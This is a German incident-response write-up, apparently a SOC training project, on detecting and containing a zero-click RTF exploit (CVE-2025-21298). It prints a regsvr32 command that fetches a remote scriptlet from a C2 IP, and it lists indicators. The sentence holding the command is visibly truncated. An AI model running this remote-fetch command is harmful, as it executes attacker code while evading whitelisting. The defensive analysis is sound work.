
Technische Untersuchung und Eindämmung eines Zero-Click-RCE-Exploits mit kritischem Schweregrad (CVE-2025-21298) mithilfe von EDR-Telemetrie und statischer Malware-Analyse.
Dieses Projekt dokumentiert die End-to-End-Untersuchung und Eindämmung eines kritischen Zero-Click-Remote-Code-Execution-Angriffs (RCE). Mithilfe von EDR-Telemetrie und Threat Intelligence habe ich einen „Living off the Land“-Angriff (LotL) identifiziert, der automatisierte Verteidigungsmaßnahmen umging und eine Command-and-Control-Kommunikation (C2) aufbaute.
Ich habe Event ID 314 identifiziert: Windows OLE Zero-Click RCE Detection. Die erste Telemetrie zeigte, dass die bösartige Datei mail.rtf von den Perimeter-Verteidigungsmaßnahmen zugelassen wurde, was auf eine aktive Kompromittierung der Workstation „Austin“ hindeutet.

Ich habe eine Reputationsprüfung des Datei-Hashs bei VirusTotal durchgeführt. Die Ergebnisse bestätigten eine Erkennungsrate von 25/55 und identifizierten die Datei eindeutig als weaponisiertes RTF, das CVE-2025-21298 ausnutzt. Diese Schwachstelle ermöglicht Remote-Code-Ausführung über den Windows-Vorschaubereich ohne Benutzerinteraktion.

Ich bin zur EDR-Terminalhistorie des Hosts „Austin“ gewechselt, um das Post-Exploitation-Verhalten zu identifizieren. Dabei entdeckte ich eine bösartige Ausführung im Sinne von „Living off the Land“ (LotL):
regsvr32.exe /s /u /i:http://84.38.130.118/...regsvr32.exe), um ein bösartiges Scriptlet von einem entfernten Server abzurufen und dabei Standard-Anwendungs-Whitelisting sowie herkömmliche AV-Signaturen zu umgehen.

Gemäß dem NIST Incident Response Framework wurde die sofortige Eindämmung priorisiert. Ich habe eine Netzwerkisolation auf dem betroffenen Host durchgeführt, um die C2-Kommunikation zu beenden und laterale Bewegung innerhalb des Firmennetzwerks zu verhindern.

Der Vorfall wurde als True Positive abgeschlossen. Ich habe die Angreifer-IP (84.38.130.118) und die forensischen Beweise für die Threat-Intelligence- und Firewall-Teams dokumentiert, um zukünftige Vorfälle zu verhindern.

| Typ | Wert |
|---|
| C2-IP-Adresse | 84.38.130.118 |
| Datei-Hash (SHA256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| Schwachstelle | CVE-2025-21298 |
| MITRE ATT&CK | T1218.010 - Signed Binary Proxy Execution: Regsvr32 |